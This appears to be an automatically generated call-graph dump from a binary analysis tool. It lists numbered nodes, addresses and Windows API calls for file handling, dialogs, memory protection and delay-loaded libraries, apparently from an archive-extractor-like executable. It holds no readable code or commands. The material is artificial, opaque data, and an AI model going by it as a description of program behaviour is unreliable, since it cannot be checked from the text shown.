SHGetMalloc 23602->23758 23607 73bc1c 23759 73b425 SHGetMalloc 23607->23759 23608 73c73f 97 API calls 23610 73bddd 23608->23610 23693 73da52 23610->23693 23611 73bc28 23760 72f3fa 82 API calls 2 library calls 23611->23760 23613 73bccb 23613->23563 23618 73bce1 UnmapViewOfFile CloseHandle 23613->23618 23615 73bc3f MapViewOfFile 23615->23619 23617 73c73f 97 API calls 23623 73be03 23617->23623 23618->23563 23619->23613 23620 73bcb7 Sleep 23619->23620 23620->23613 23620->23619 23621 73be2c 23761 7212d3 GetDlgItem EnableWindow 23621->23761 23623->23621 23625 73c73f 97 API calls 23623->23625 23624->23471 23624->23497 23625->23621 23627 721378 23626->23627 23628 72131f 23626->23628 23767 72e2c1 GetWindowLongW SetWindowLongW 23627->23767 23630 721385 23628->23630 23766 72e2e8 62 API calls 2 library calls 23628->23766 23630->23464 23630->23465 23630->23466 23632 721341 23632->23630 23633 721354 GetDlgItem 23632->23633 23633->23630 23634 721364 23633->23634 23634->23630 23635 72136a SetWindowTextW 23634->23635 23635->23630 23639 72a0bb 23636->23639 23637 72a14c 23638 72a2b2 8 API calls 23637->23638 23640 72a175 23637->23640 23638->23640 23639->23637 23639->23640 23768 72a2b2 23639->23768 23640->23526 23640->23527 23642->23539 23806 724065 23643->23806 23647 729678 23646->23647 23648 7296d5 CreateFileW 23647->23648 23649 7296c9 23647->23649 23648->23649 23650 72971f 23649->23650 23651 72bb03 GetCurrentDirectoryW 23649->23651 23650->23590 23652 729704 23651->23652 23652->23650 23653 729708 CreateFileW 23652->23653 23653->23650 23655 7295cf 23654->23655 23656 7295be 23654->23656 23655->23547 23656->23655 23657 7295d1 23656->23657 23658 7295ca 23656->23658 23883 729620 23657->23883 23878 72974e 23658->23878 23661->23566 23662->23579 23664 72e627 23663->23664 23898 72e648 23664->23898 23667 7212f1 GetDlgItem ShowWindow 23667->23596 23669 73c749 __EH_prolog 23668->23669 23675 73bdcf 23669->23675 23921 73b314 23669->23921 23672 73b314 ExpandEnvironmentStringsW 23682 73c780 _wcslen _wcsrchr 23672->23682 23673 73ca67 SetWindowTextW 23673->23682 23675->23608 23679 73c855 SetFileAttributesW 23680 73c90f GetFileAttributesW 23679->23680 23692 73c86f __cftof _wcslen 23679->23692 23680->23682 23684 73c921 DeleteFileW 23680->23684 23682->23672 23682->23673 23682->23675 23682->23679 23685 73cc31 GetDlgItem SetWindowTextW SendMessageW 23682->23685 23689 73cc71 SendMessageW 23682->23689 23925 731fbb CompareStringW 23682->23925 23926 73a64d GetCurrentDirectoryW 23682->23926 23928 72a5d1 6 API calls 23682->23928 23929 72a55a FindClose 23682->23929 23930 73b48e 76 API calls 2 library calls 23682->23930 23931 743e3e 23682->23931 23684->23682 23686 73c932 23684->23686 23685->23682 23687 724092 _swprintf 51 API calls 23686->23687 23688 73c952 GetFileAttributesW 23687->23688 23688->23686 23690 73c967 MoveFileW 23688->23690 23689->23682 23690->23682 23691 73c97f MoveFileExW 23690->23691 23691->23682 23692->23680 23692->23682 23927 72b991 51 API calls 3 library calls 23692->23927 23694 73da5c __EH_prolog 23693->23694 23955 730659 23694->23955 23696 73da8d 23959 725b3d 23696->23959 23698 73daab 23963 727b0d 23698->23963 23702 73dafe 23979 727b9e 23702->23979 23704 73bdee 23704->23617 23706 73d6a8 23705->23706 24458 73a5c6 23706->24458 23709 73d6b5 GetWindow 23710 73d6d5 23709->23710 23711 73bf15 23709->23711 23710->23711 23712 73d6e2 GetClassNameW 23710->23712 23714 73d706 GetWindowLongW 23710->23714 23715 73d76a GetWindow 23710->23715 23711->23473 23711->23474 24463 731fbb CompareStringW 23712->24463 23714->23715 23716 73d716 SendMessageW 23714->23716 23715->23710 23715->23711 23716->23715 23717 73d72c GetObjectW 23716->23717 24464 73a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23717->24464 23719 73d743 24465 73a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 23719->24465 24466 73a80c 8 API calls 23719->24466 23722 73d754 SendMessageW DeleteObject 23722->23715 23723->23489 23725 73abf1 23724->23725 23726 73abcc 23724->23726 23728 73abf6 SHAutoComplete 23725->23728 23729 73abff 23725->23729 24469 731fbb CompareStringW 23726->24469 23728->23729 23732 73b093 23729->23732 23730 73abdf 23730->23725 23731 73abe3 FindWindowExW 23730->23731 23731->23725 23733 73b09d __EH_prolog 23732->23733 23734 7213dc 84 API calls 23733->23734 23735 73b0bf 23734->23735 24470 721fdc 23735->24470 23738 73b0eb 23741 7219af 128 API calls 23738->23741 23739 73b0d9 23740 721692 86 API calls 23739->23740 23742 73b0e4 23740->23742 23744 73b10d __InternalCxxFrameHandler ___std_exception_copy 23741->23744 23742->23515 23742->23518 23743 721692 86 API calls 23743->23742 23744->23743 23745->23496 24478 73b568 PeekMessageW 23746->24478 23749 73d502 23755 73d50d ShowWindow SendMessageW SendMessageW 23749->23755 23750 73d536 SendMessageW SendMessageW 23751 73d572 23750->23751 23752 73d591 SendMessageW SendMessageW SendMessageW 23750->23752 23751->23752 23753 73d5e7 SendMessageW 23752->23753 23754 73d5c4 SendMessageW 23752->23754 23753->23513 23754->23753 23755->23750 23756->23575 23757->23602 23758->23607 23759->23611 23760->23615 23761->23624 23762->23556 23763->23576 23764->23549 23765->23537 23766->23632 23767->23630 23769 72a2bf 23768->23769 23770 72a2e3 23769->23770 23771 72a2d6 CreateDirectoryW 23769->23771 23789 72a231 23770->23789 23771->23770 23773 72a316 23771->23773 23775 72a325 23773->23775 23781 72a4ed 23773->23781 23775->23639 23776 72a329 GetLastError 23776->23775 23779 72a2ff 23779->23776 23780 72a303 CreateDirectoryW 23779->23780 23780->23773 23780->23776 23796 73ec50 23781->23796 23784 72a510 23786 72bb03 GetCurrentDirectoryW 23784->23786 23785 72a53d 23785->23775 23787 72a524 23786->23787 23787->23785 23788 72a528 SetFileAttributesW 23787->23788 23788->23785 23798 72a243 23789->23798 23792 72bb03 23793 72bb10 _wcslen 23792->23793 23794 72bbb8 GetCurrentDirectoryW 23793->23794 23795 72bb39 _wcslen 23793->23795 23794->23795 23795->23779 23797 72a4fa SetFileAttributesW 23796->23797 23797->23784 23797->23785 23799 73ec50 23798->23799 23800 72a250 GetFileAttributesW 23799->23800 23801 72a261 23800->23801 23802 72a23a 23800->23802 23803 72bb03 GetCurrentDirectoryW 23801->23803 23802->23776 23802->23792 23804 72a275 23803->23804 23804->23802 23805 72a279 GetFileAttributesW 23804->23805 23805->23802 23807 72407c __vsnwprintf_l 23806->23807 23810 745fd4 23807->23810 23813 744097 23810->23813 23814 7440d7 23813->23814 23815 7440bf 23813->23815 23814->23815 23817 7440df 23814->23817 23830 7491a8 20 API calls __dosmaperr 23815->23830 23832 744636 23817->23832 23818 7440c4 23831 749087 26 API calls __cftof 23818->23831 23822 73fbbc CatchGuardHandler 5 API calls 23824 724086 23822->23824 23824->23567 23825 744167 23841 7449e6 51 API calls 3 library calls 23825->23841 23828 7440cf 23828->23822 23829 744172 23842 7446b9 20 API calls _free 23829->23842 23830->23818 23831->23828 23833 744653 23832->23833 23834 7440ef 23832->23834 23833->23834 23843 7497e5 GetLastError 23833->23843 23840 744601 20 API calls 2 library calls 23834->23840 23836 744674 23864 74993a 38 API calls __cftof 23836->23864 23838 74468d 23865 749967 38 API calls __cftof 23838->23865 23840->23825 23841->23829 23842->23828 23844 749807 23843->23844 23845 7497fb 23843->23845 23867 74b136 20 API calls 2 library calls 23844->23867 23866 74ae5b 11 API calls 2 library calls 23845->23866 23848 749801 23848->23844 23850 749850 SetLastError 23848->23850 23849 749813 23855 74981b 23849->23855 23874 74aeb1 11 API calls 2 library calls 23849->23874 23850->23836 23853 749830 23853->23855 23856 749837 23853->23856 23854 749821 23858 74985c SetLastError 23854->23858 23868 748dcc 23855->23868 23875 749649 20 API calls __dosmaperr 23856->23875 23876 748d24 38 API calls _abort 23858->23876 23859 749842 23861 748dcc _free 20 API calls 23859->23861 23863 749849 23861->23863 23863->23850 23863->23858 23864->23838 23865->23834 23866->23848 23867->23849 23869 748e00 _free 23868->23869 23870 748dd7 RtlFreeHeap 23868->23870 23869->23854 23870->23869 23871 748dec 23870->23871 23877 7491a8 20 API calls __dosmaperr 23871->23877 23873 748df2 GetLastError 23873->23869 23874->23853 23875->23859 23877->23873 23879 729781 23878->23879 23880 729757 23878->23880 23879->23655 23880->23879 23889 72a1e0 23880->23889 23884 72964a 23883->23884 23885 72962c 23883->23885 23886 729669 23884->23886 23897 726bd5 76 API calls 23884->23897 23885->23884 23887 729638 CloseHandle 23885->23887 23886->23655 23887->23884 23890 73ec50 23889->23890 23891 72a1ed DeleteFileW 23890->23891 23892 72a200 23891->23892 23893 72977f 23891->23893 23894 72bb03 GetCurrentDirectoryW 23892->23894 23893->23655 23895 72a214 23894->23895 23895->23893 23896 72a218 DeleteFileW 23895->23896 23896->23893 23897->23886 23904 72d9b0 23898->23904 23901 72e645 SetDlgItemTextW 23901->23667 23902 72e66b LoadStringW 23902->23901 23903 72e682 LoadStringW 23902->23903 23903->23901 23909 72d8ec 23904->23909 23906 72d9cd 23908 72d9e2 23906->23908 23917 72d9f0 26 API calls 23906->23917 23908->23901 23908->23902 23910 72d904 23909->23910 23916 72d984 _strncpy 23909->23916 23911 72d928 23910->23911 23918 731da7 WideCharToMultiByte 23910->23918 23913 72d959 23911->23913 23919 72e5b1 50 API calls __vsnprintf 23911->23919 23920 746159 26 API calls 3 library calls 23913->23920 23916->23906 23917->23908 23918->23911 23919->23913 23920->23916 23922 73b31e 23921->23922 23923 73b3f0 ExpandEnvironmentStringsW 23922->23923 23924 73b40d 23922->23924 23923->23924 23924->23682 23925->23682 23926->23682 23927->23692 23928->23682 23929->23682 23930->23682 23932 748e54 23931->23932 23933 748e61 23932->23933 23934 748e6c 23932->23934 23944 748e06 23933->23944 23936 748e74 23934->23936 23942 748e7d __dosmaperr 23934->23942 23937 748dcc _free 20 API calls 23936->23937 23940 748e69 23937->23940 23938 748ea7 HeapReAlloc 23938->23940 23938->23942 23939 748e82 23951 7491a8 20 API calls __dosmaperr 23939->23951 23940->23682 23942->23938 23942->23939 23952 747a5e 7 API calls 2 library calls 23942->23952 23945 748e44 23944->23945 23946 748e14 __dosmaperr 23944->23946 23954 7491a8 20 API calls __dosmaperr 23945->23954 23946->23945 23948 748e2f RtlAllocateHeap 23946->23948 23953 747a5e 7 API calls 2 library calls 23946->23953 23948->23946 23949 748e42 23948->23949 23949->23940 23951->23940 23952->23942 23953->23946 23954->23949 23956 730666 _wcslen 23955->23956 23983 7217e9 23956->23983 23958 73067e 23958->23696 23960 730659 _wcslen 23959->23960 23961 7217e9 78 API calls 23960->23961 23962 73067e 23961->23962 23962->23698 23964 727b17 __EH_prolog 23963->23964 24000 72ce40 23964->24000 23966 727b32 24006 73eb38 23966->24006 23968 727b5c 24015 734a76 23968->24015 23971 727c7d 23972 727c87 23971->23972 23974 727cf1 23972->23974 24047 72a56d 23972->24047 23977 727d50 23974->23977 24025 728284 23974->24025 23975 727d92 23975->23702 23977->23975 24053 72138b 74 API calls 23977->24053 23980 727bac 23979->23980 23982 727bb3 23979->23982 23981 732297 86 API calls 23980->23981 23981->23982 23984 7217ff 23983->23984 23995 72185a __InternalCxxFrameHandler 23983->23995 23985 721828 23984->23985 23996 726c36 76 API calls __vswprintf_c_l 23984->23996 23986 721887 23985->23986 23987 721847 ___std_exception_copy 23985->23987 23990 743e3e 22 API calls 23986->23990 23987->23995 23998 726ca7 75 API calls 23987->23998 23989 72181e 23997 726ca7 75 API calls 23989->23997 23992 72188e 23990->23992 23992->23995 23999 726ca7 75 API calls 23992->23999 23995->23958 23996->23989 23997->23985 23998->23995 23999->23995 24001 72ce4a __EH_prolog 24000->24001 24002 73eb38 8 API calls 24001->24002 24003 72ce8d 24002->24003 24004 73eb38 8 API calls 24003->24004 24005 72ceb1 24004->24005 24005->23966 24008 73eb3d ___std_exception_copy 24006->24008 24007 73eb57 24007->23968 24008->24007 24011 73eb59 24008->24011 24021 747a5e 7 API calls 2 library calls 24008->24021 24010 73f5c9 24023 74238d RaiseException 24010->24023 24011->24010 24022 74238d RaiseException 24011->24022 24014 73f5e6 24016 734a80 __EH_prolog 24015->24016 24017 73eb38 8 API calls 24016->24017 24018 734a9c 24017->24018 24019 727b8b 24018->24019 24024 730e46 80 API calls 24018->24024 24019->23971 24021->24008 24022->24010 24023->24014 24024->24019 24026 72828e __EH_prolog 24025->24026 24054 7213dc 24026->24054 24028 7282aa 24029 7282bb 24028->24029 24194 729f42 24028->24194 24032 7282f2 24029->24032 24062 721a04 24029->24062 24190 721692 24032->24190 24035 728389 24081 728430 24035->24081 24038 7283e8 24086 721f6d 24038->24086 24042 7282ee 24042->24032 24042->24035 24045 72a56d 7 API calls 24042->24045 24198 72c0c5 CompareStringW _wcslen 24042->24198 24043 7283f3 24043->24032 24090 723b2d 24043->24090 24102 72848e 24043->24102 24045->24042 24048 72a582 24047->24048 24052 72a5b0 24048->24052 24447 72a69b 24048->24447 24050 72a592 24051 72a597 FindClose 24050->24051 24050->24052 24051->24052 24052->23972 24053->23975 24055 7213e1 __EH_prolog 24054->24055 24056 72ce40 8 API calls 24055->24056 24057 721419 24056->24057 24058 73eb38 8 API calls 24057->24058 24061 721474 __cftof 24057->24061 24059 721461 24058->24059 24059->24061 24200 72b505 24059->24200 24061->24028 24063 721a0e __EH_prolog 24062->24063 24075 721a61 24063->24075 24078 721b9b 24063->24078 24216 7213ba 24063->24216 24066 721bc7 24219 72138b 74 API calls 24066->24219 24068 723b2d 101 API calls 24072 721c12 24068->24072 24069 721bd4 24069->24068 24069->24078 24070 721c5a 24074 721c8d 24070->24074 24070->24078 24220 72138b 74 API calls 24070->24220 24072->24070 24073 723b2d 101 API calls 24072->24073 24073->24072 24074->24078 24080 729e80 79 API calls 24074->24080 24075->24066 24075->24069 24075->24078 24076 723b2d 101 API calls 24077 721cde 24076->24077 24077->24076 24077->24078 24078->24042 24079 729e80 79 API calls 24079->24075 24080->24077 24238 72cf3d 24081->24238 24083 728440 24242 7313d2 GetSystemTime SystemTimeToFileTime 24083->24242 24085 7283a3 24085->24038 24199 731b66 72 API calls 24085->24199 24087 721f72 __EH_prolog 24086->24087 24089 721fa6 24087->24089 24243 7219af 24087->24243 24089->24043 24091 723b39 24090->24091 24092 723b3d 24090->24092 24091->24043 24101 729e80 79 API calls 24092->24101 24093 723b4f 24094 723b78 24093->24094 24095 723b6a 24093->24095 24374 72286b 101 API calls 3 library calls 24094->24374 24096 723baa 24095->24096 24373 7232f7 89 API calls 2 library calls 24095->24373 24096->24043 24099 723b76 24099->24096 24375 7220d7 74 API calls 24099->24375 24101->24093 24103 728498 __EH_prolog 24102->24103 24106 7284d5 24103->24106 24113 728513 24103->24113 24400 738c8d 103 API calls 24103->24400 24105 7284f5 24107 7284fa 24105->24107 24108 72851c 24105->24108 24106->24105 24110 72857a 24106->24110 24106->24113 24107->24113 24401 727a0d 152 API calls 24107->24401 24108->24113 24402 738c8d 103 API calls 24108->24402 24110->24113 24376 725d1a 24110->24376 24113->24043 24114 728605 24114->24113 24382 728167 24114->24382 24117 728797 24118 72a56d 7 API calls 24117->24118 24120 728802 24117->24120 24118->24120 24119 72d051 82 API calls 24127 72885d 24119->24127 24388 727c0d 24120->24388 24122 72898b 24405 722021 74 API calls 24122->24405 24123 728a5f 24128 728ab6 24123->24128 24141 728a6a 24123->24141 24124 728992 24124->24123 24129 7289e1 24124->24129 24127->24113 24127->24119 24127->24122 24127->24124 24403 728117 84 API calls 24127->24403 24404 722021 74 API calls 24127->24404 24136 728a4c 24128->24136 24408 727fc0 97 API calls 24128->24408 24133 72a231 3 API calls 24129->24133 24129->24136 24138 728b14 24129->24138 24130 729105 24135 72959a 80 API calls 24130->24135 24131 728ab4 24132 72959a 80 API calls 24131->24132 24132->24113 24137 728a19 24133->24137 24135->24113 24136->24131 24136->24138 24137->24136 24406 7292a3 97 API calls 24137->24406 24138->24130 24150 728b82 24138->24150 24409 7298bc 24138->24409 24139 72ab1a 8 API calls 24142 728bd1 24139->24142 24141->24131 24407 727db2 101 API calls 24141->24407 24145 72ab1a 8 API calls 24142->24145 24162 728be7 24145->24162 24148 728b70 24413 726e98 77 API calls 24148->24413 24150->24139 24151 728cbc 24152 728e40 24151->24152 24153 728d18 24151->24153 24156 728e52 24152->24156 24157 728e66 24152->24157 24176 728d49 24152->24176 24154 728d8a 24153->24154 24155 728d28 24153->24155 24164 728167 19 API calls 24154->24164 24159 728d6e 24155->24159 24167 728d37 24155->24167 24160 729215 123 API calls 24156->24160 24158 733377 75 API calls 24157->24158 24161 728e7f 24158->24161 24159->24176 24416 7277b8 111 API calls 24159->24416 24160->24176 24419 733020 123 API calls 24161->24419 24162->24151 24163 728c93 24162->24163 24170 72981a 79 API calls 24162->24170 24163->24151 24414 729a3c 82 API calls 24163->24414 24168 728dbd 24164->24168 24415 722021 74 API calls 24167->24415 24172 728de6 24168->24172 24173 728df5 24168->24173 24168->24176 24170->24163 24417 727542 85 API calls 24172->24417 24418 729155 93 API calls __EH_prolog 24173->24418 24179 728f85 24176->24179 24420 722021 74 API calls 24176->24420 24178 729090 24178->24130 24181 72a4ed 3 API calls 24178->24181 24179->24130 24179->24178 24180 72903e 24179->24180 24394 729f09 SetEndOfFile 24179->24394 24395 729da2 24180->24395 24182 7290eb 24181->24182 24182->24130 24421 722021 74 API calls 24182->24421 24185 729085 24187 729620 77 API calls 24185->24187 24187->24178 24188 7290fb 24422 726dcb 76 API calls _wcschr 24188->24422 24191 7216a4 24190->24191 24438 72cee1 24191->24438 24195 729f59 24194->24195 24196 729f63 24195->24196 24446 726d0c 78 API calls 24195->24446 24196->24029 24198->24042 24199->24038 24201 72b50f __EH_prolog 24200->24201 24206 72f1d0 82 API calls 24201->24206 24203 72b521 24207 72b61e 24203->24207 24206->24203 24208 72b630 __cftof 24207->24208 24211 7310dc 24208->24211 24214 73109e GetCurrentProcess GetProcessAffinityMask 24211->24214 24215 72b597 24214->24215 24215->24061 24221 721732 24216->24221 24218 7213d6 24218->24079 24219->24078 24220->24074 24222 721748 24221->24222 24233 7217a0 __InternalCxxFrameHandler 24221->24233 24223 721771 24222->24223 24234 726c36 76 API calls __vswprintf_c_l 24222->24234 24224 7217c7 24223->24224 24229 72178d ___std_exception_copy 24223->24229 24226 743e3e 22 API calls 24224->24226 24228 7217ce 24226->24228 24227 721767 24235 726ca7 75 API calls 24227->24235 24228->24233 24237 726ca7 75 API calls 24228->24237 24229->24233 24236 726ca7 75 API calls 24229->24236 24233->24218 24234->24227 24235->24223 24236->24233 24237->24233 24239 72cf4d 24238->24239 24241 72cf54 24238->24241 24240 72981a 79 API calls 24239->24240 24240->24241 24241->24083 24242->24085 24244 7219bb 24243->24244 24245 7219bf 24243->24245 24244->24089 24247 7218f6 24245->24247 24248 721908 24247->24248 24249 721945 24247->24249 24250 723b2d 101 API calls 24248->24250 24255 723fa3 24249->24255 24253 721928 24250->24253 24253->24244 24257 723fac 24255->24257 24256 723b2d 101 API calls 24256->24257 24257->24256 24259 721966 24257->24259 24272 730e08 24257->24272 24259->24253 24260 721e50 24259->24260 24261 721e5a __EH_prolog 24260->24261 24280 723bba 24261->24280 24263 721e84 24264 721732 78 API calls 24263->24264 24267 721f0b 24263->24267 24265 721e9b 24264->24265 24308 7218a9 78 API calls 24265->24308 24267->24253 24268 721eb3 24270 721ebf _wcslen 24268->24270 24309 731b84 MultiByteToWideChar 24268->24309 24310 7218a9 78 API calls 24270->24310 24273 730e0f 24272->24273 24274 730e2a 24273->24274 24278 726c31 RaiseException CallUnexpected 24273->24278 24276 730e3b SetThreadExecutionState 24274->24276 24279 726c31 RaiseException CallUnexpected 24274->24279 24276->24257 24278->24274 24279->24276 24281 723bc4 __EH_prolog 24280->24281 24282 723bf6 24281->24282 24283 723bda 24281->24283 24285 723e51 24282->24285 24288 723c22 24282->24288 24336 72138b 74 API calls 24283->24336 24353 72138b 74 API calls 24285->24353 24287 723be5 24287->24263 24288->24287 24311 733377 24288->24311 24290 723ca3 24291 723d2e 24290->24291 24307 723c9a 24290->24307 24339 72d051 24290->24339 24321 72ab1a 24291->24321 24292 723c9f 24292->24290 24338 7220bd 78 API calls 24292->24338 24294 723c71 24294->24290 24294->24292 24295 723c8f 24294->24295 24337 72138b 74 API calls 24295->24337 24299 723d41 24301 723dd7 24299->24301 24302 723dc7 24299->24302 24345 733020 123 API calls 24301->24345 24325 729215 24302->24325 24305 723dd5 24305->24307 24346 722021 74 API calls 24305->24346 24347 732297 24307->24347 24308->24268 24309->24270 24310->24267 24312 73338c 24311->24312 24315 733396 ___std_exception_copy 24311->24315 24354 726ca7 75 API calls 24312->24354 24314 7334c6 24356 74238d RaiseException 24314->24356 24315->24314 24316 73341c 24315->24316 24320 733440 __cftof 24315->24320 24355 7332aa 75 API calls 3 library calls 24316->24355 24319 7334f2 24320->24294 24322 72ab28 24321->24322 24324 72ab32 24321->24324 24323 73eb38 8 API calls 24322->24323 24323->24324 24324->24299 24326 72921f __EH_prolog 24325->24326 24357 727c64 24326->24357 24329 7213ba 78 API calls 24330 729231 24329->24330 24360 72d114 24330->24360 24332 729243 24333 72928a 24332->24333 24335 72d114 118 API calls 24332->24335 24369 72d300 97 API calls __InternalCxxFrameHandler 24332->24369 24333->24305 24335->24332 24336->24287 24337->24307 24338->24290 24340 72d072 24339->24340 24341 72d084 24339->24341 24370 72603a 82 API calls 24340->24370 24371 72603a 82 API calls 24341->24371 24344 72d07c 24344->24291 24345->24305 24346->24307 24348 7322a1 24347->24348 24349 7322ba 24348->24349 24352 7322ce 24348->24352 24372 730eed 86 API calls 24349->24372 24351 7322c1 24351->24352 24353->24287 24354->24315 24355->24320 24356->24319 24358 72b146 GetVersionExW 24357->24358 24359 727c69 24358->24359 24359->24329 24367 72d12a __InternalCxxFrameHandler 24360->24367 24361 72d29a 24362 72d2ce 24361->24362 24363 72d0cb 6 API calls 24361->24363 24364 730e08 SetThreadExecutionState RaiseException 24362->24364 24363->24362 24366 72d291 24364->24366 24365 738c8d 103 API calls 24365->24367 24366->24332 24367->24361 24367->24365 24367->24366 24368 72ac05 91 API calls 24367->24368 24368->24367 24369->24332 24370->24344 24371->24344 24372->24351 24373->24099 24374->24099 24375->24096 24377 725d2a 24376->24377 24423 725c4b 24377->24423 24379 725d5d 24381 725d95 24379->24381 24428 72b1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 24379->24428 24381->24114 24383 728186 24382->24383 24384 728232 24383->24384 24435 72be5e 19 API calls __InternalCxxFrameHandler 24383->24435 24434 731fac CharUpperW 24384->24434 24387 72823b 24387->24117 24389 727c22 24388->24389 24390 727c5a 24389->24390 24436 726e7a 74 API calls 24389->24436 24390->24127 24392 727c52 24437 72138b 74 API calls 24392->24437 24394->24180 24396 729db3 24395->24396 24399 729dc2 24395->24399 24397 729db9 FlushFileBuffers 24396->24397 24396->24399 24397->24399 24398 729e3f SetFileTime 24398->24185 24399->24398 24400->24106 24401->24113 24402->24113 24403->24127 24404->24127 24405->24124 24406->24136 24407->24131 24408->24136 24410 7298c5 GetFileType 24409->24410 24411 728b5a 24409->24411 24410->24411 24411->24150 24412 722021 74 API calls 24411->24412 24412->24148 24413->24150 24414->24151 24415->24176 24416->24176 24417->24176 24418->24176 24419->24176 24420->24179 24421->24188 24422->24130 24429 725b48 24423->24429 24425 725c6c 24425->24379 24427 725b48 2 API calls 24427->24425 24428->24379 24430 725b52 24429->24430 24432 725c3a 24430->24432 24433 72b1dc CharUpperW CompareStringW _wcslen ___vcrt_InitializeCriticalSectionEx 24430->24433 24432->24425 24432->24427 24433->24430 24434->24387 24435->24384 24436->24392 24437->24390 24439 72cef2 24438->24439 24444 72a99e 86 API calls 24439->24444 24441 72cf24 24445 72a99e 86 API calls 24441->24445 24443 72cf2f 24444->24441 24445->24443 24446->24196 24448 72a6a8 24447->24448 24449 72a6c1 FindFirstFileW 24448->24449 24450 72a727 FindNextFileW 24448->24450 24452 72a6d0 24449->24452 24457 72a709 24449->24457 24451 72a732 GetLastError 24450->24451 24450->24457 24451->24457 24453 72bb03 GetCurrentDirectoryW 24452->24453 24454 72a6e0 24453->24454 24455 72a6e4 FindFirstFileW 24454->24455 24456 72a6fe GetLastError 24454->24456 24455->24456 24455->24457 24456->24457 24457->24050 24467 73a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24458->24467 24460 73a5cd 24461 73a5d9 24460->24461 24468 73a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24460->24468 24461->23709 24461->23711 24463->23710 24464->23719 24465->23719 24466->23722 24467->24460 24468->24461 24469->23730 24471 729f42 78 API calls 24470->24471 24472 721fe8 24471->24472 24473 722005 24472->24473 24474 721a04 101 API calls 24472->24474 24473->23738 24473->23739 24475 721ff5 24474->24475 24475->24473 24477 72138b 74 API calls 24475->24477 24477->24473 24479 73b583 GetMessageW 24478->24479 24480 73b5bc GetDlgItem 24478->24480 24481 73b599 IsDialogMessageW 24479->24481 24482 73b5a8 TranslateMessage DispatchMessageW 24479->24482 24480->23749 24480->23750 24481->24480 24481->24482 24482->24480 24483 7213e1 84 API calls 2 library calls 25292 7394e0 GetClientRect 25321 7321e0 26 API calls std::bad_exception::bad_exception 25339 73f2e0 46 API calls __RTC_Initialize 24484 73eae7 24485 73eaf1 24484->24485 24488 73e85d 24485->24488 24514 73e5bb 24488->24514 24490 73e86d 24491 73e8ca 24490->24491 24501 73e8ee 24490->24501 24492 73e7fb DloadReleaseSectionWriteAccess 6 API calls 24491->24492 24493 73e8d5 RaiseException 24492->24493 24507 73eac3 24493->24507 24494 73e9d9 24498 73ea95 24494->24498 24500 73ea37 GetProcAddress 24494->24500 24495 73e966 LoadLibraryExA 24496 73e9c7 24495->24496 24497 73e979 GetLastError 24495->24497 24496->24494 24502 73e9d2 FreeLibrary 24496->24502 24499 73e9a2 24497->24499 24511 73e98c 24497->24511 24523 73e7fb 24498->24523 24503 73e7fb DloadReleaseSectionWriteAccess 6 API calls 24499->24503 24500->24498 24504 73ea47 GetLastError 24500->24504 24501->24494 24501->24495 24501->24496 24501->24498 24502->24494 24505 73e9ad RaiseException 24503->24505 24509 73ea5a 24504->24509 24505->24507 24508 73e7fb DloadReleaseSectionWriteAccess 6 API calls 24510 73ea7b RaiseException 24508->24510 24509->24498 24509->24508 24512 73e5bb ___delayLoadHelper2@8 6 API calls 24510->24512 24511->24496 24511->24499 24513 73ea92 24512->24513 24513->24498 24515 73e5c7 24514->24515 24516 73e5ed 24514->24516 24531 73e664 24515->24531 24516->24490 24518 73e5e8 24539 73e5ee GetModuleHandleW GetProcAddress GetProcAddress 24518->24539 24519 73e5cc 24519->24518 24534 73e78d 24519->24534 24522 73e836 24522->24490 24524 73e82f 24523->24524 24525 73e80d 24523->24525 24524->24507 24526 73e664 DloadReleaseSectionWriteAccess 3 API calls 24525->24526 24527 73e812 24526->24527 24528 73e82a 24527->24528 24529 73e78d DloadProtectSection 3 API calls 24527->24529 24542 73e831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 24528->24542 24529->24528 24540 73e5ee GetModuleHandleW GetProcAddress GetProcAddress 24531->24540 24533 73e669 24533->24519 24535 73e7a2 DloadProtectSection 24534->24535 24536 73e7a8 24535->24536 24537 73e7dd VirtualProtect 24535->24537 24541 73e6a3 VirtualQuery GetSystemInfo 24535->24541 24536->24518 24537->24536 24539->24522 24540->24533 24541->24537 24542->24524 25293 73f4e7 29 API calls _abort 25340 74bee0 GetCommandLineA GetCommandLineW 25322 72f1e8 FreeLibrary 25294 73f4d3 20 API calls 24698 73e1d1 14 API calls ___delayLoadHelper2@8 24700 73e2d7 24701 73e1db 24700->24701 24702 73e85d ___delayLoadHelper2@8 14 API calls 24701->24702 24702->24701 25360 74a3d0 21 API calls 2 library calls 25361 752bd0 VariantClear 24704 7210d5 24709 725abd 24704->24709 24710 725ac7 __EH_prolog 24709->24710 24711 72b505 84 API calls 24710->24711 24712 725ad3 24711->24712 24716 725cac GetCurrentProcess GetProcessAffinityMask 24712->24716 25342 740ada 51 API calls 2 library calls 24779 73dec2 24780 73decf 24779->24780 24781 72e617 53 API calls 24780->24781 24782 73dedc 24781->24782 24783 724092 _swprintf 51 API calls 24782->24783 24784 73def1 SetDlgItemTextW 24783->24784 24785 73b568 5 API calls 24784->24785 24786 73df0e 24785->24786 25324 73b5c0 100 API calls 25362 7377c0 118 API calls 25363 73ffc0 RaiseException _com_error::_com_error CallUnexpected 25343 7362ca 123 API calls __InternalCxxFrameHandler 24798 73f3b2 24799 73f3be __FrameHandler3::FrameUnwindToState 24798->24799 24830 73eed7 24799->24830 24801 73f3c5 24802 73f518 24801->24802 24805 73f3ef 24801->24805 24903 73f838 4 API calls 2 library calls 24802->24903 24804 73f51f 24896 747f58 24804->24896 24814 73f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24805->24814 24841 748aed 24805->24841 24812 73f40e 24815 73f48f 24814->24815 24899 747af4 38 API calls 2 library calls 24814->24899 24849 73f953 GetStartupInfoW __cftof 24815->24849 24817 73f495 24850 748a3e 51 API calls 24817->24850 24819 73f49d 24851 73df1e 24819->24851 24824 73f4b1 24824->24804 24825 73f4b5 24824->24825 24826 73f4be 24825->24826 24901 747efb 28 API calls _abort 24825->24901 24902 73f048 12 API calls ___scrt_uninitialize_crt 24826->24902 24829 73f4c6 24829->24812 24831 73eee0 24830->24831 24905 73f654 IsProcessorFeaturePresent 24831->24905 24833 73eeec 24906 742a5e 24833->24906 24835 73eef1 24836 73eef5 24835->24836 24914 748977 24835->24914 24836->24801 24839 73ef0c 24839->24801 24842 748b04 24841->24842 